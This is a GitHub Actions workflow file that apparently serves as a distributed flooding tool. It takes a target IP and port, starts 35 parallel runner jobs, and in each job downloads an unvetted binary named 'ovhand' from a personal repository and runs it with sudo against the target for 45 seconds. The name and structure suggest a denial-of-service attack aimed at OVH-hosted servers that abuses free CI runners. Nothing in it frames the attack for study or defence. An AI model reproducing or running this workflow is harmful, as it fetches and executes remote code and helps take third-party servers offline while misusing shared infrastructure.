name: OVH !

on:
  workflow_dispatch:
    inputs:
      target:
        description: "IP !"
        required: true
        default: "127.0.0.1"
      port:
        description: "Port !"
        required: true
        default: "53"
      
jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35]

    steps:
      - name: Checkout (optional)
        uses: actions/checkout@v4

      - name: OK !
        run: |
          TARGET="${{ inputs.target }}"
          PORT="${{ inputs.port }}"
          
          wget https://github.com/AhmetKesser/Deneme/raw/refs/heads/main/ovhand -O OVH
          chmod +x OVH || true
          
          sudo timeout 45 ./OVH "$TARGET" "$PORT" 4 45 &
          
      - name: Finish !
        run: |
          sleep 45
          exit 0
